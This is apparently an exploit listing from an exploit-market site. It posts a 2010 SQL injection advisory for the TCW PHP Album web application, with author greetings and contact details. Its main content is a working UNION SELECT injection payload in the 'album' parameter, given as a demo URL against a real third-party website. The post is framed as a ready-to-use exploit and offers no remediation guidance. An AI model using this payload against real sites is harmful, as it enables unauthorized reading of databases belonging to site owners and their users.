[ authorization ] [ registration ] [ restore account ]
Contact us
You can contact us by:
0day Today Exploits Market and 0day Exploits Database

TCW PHP Album SQL injection Vulnerabilty

Author
SONiC
Risk
[
Security Risk Unsored
]
0day-ID
0day-ID-13175
Category
web applications
Date add
06-07-2010
Platform
php
========================================
TCW PHP Album SQL injection Vulnerabilty 
========================================


Name : TCW PHP Album SQL iNjection Vulnerabilty
Critical Level :VERY HIGH
vendor URL :http://www.codango.com/php/fnc/goto/?id=7951410
Price:free

Author : ..::[ SONiC ]::.. aka ~the_pshyco~ <sonicdefence[at]gmail.com>

special thanks to : Sid3^effects,r0073r (inj3ct0r.com),L0rd CruSad3r,M4n0j,Bunny,Nishi,MA1201,RJ,D3aD F0x

greetz to :www.topsecure.net ,All ICW members , iNj3cT0r.com, www.andhrahackers.com

special Shoutz : my Girl Frnd [H*****]

#######################################################################################################
Description :


TCW PHP Album is a set of PHP scripts that (using MySQL and the GD Library) allow you to easily make online multimedia albums. With an intuitive administrative panel you can quickly add albums, photos, themes, and change site settings.


#######################################################################################################
Xploit :SQl i vulnerabilty

DEMO URL http://www.tcwonline.org/~greentryst/photos/index.php?album=-3%20union%20all%20select%207,6,5,4,3,2,1--


###############################################################################################################

# ..::[ SONiC ]::.. aka the_pshyco
# profile http://inj3ct0r.com/author/2545




#  0day.today [2024-09-29]  #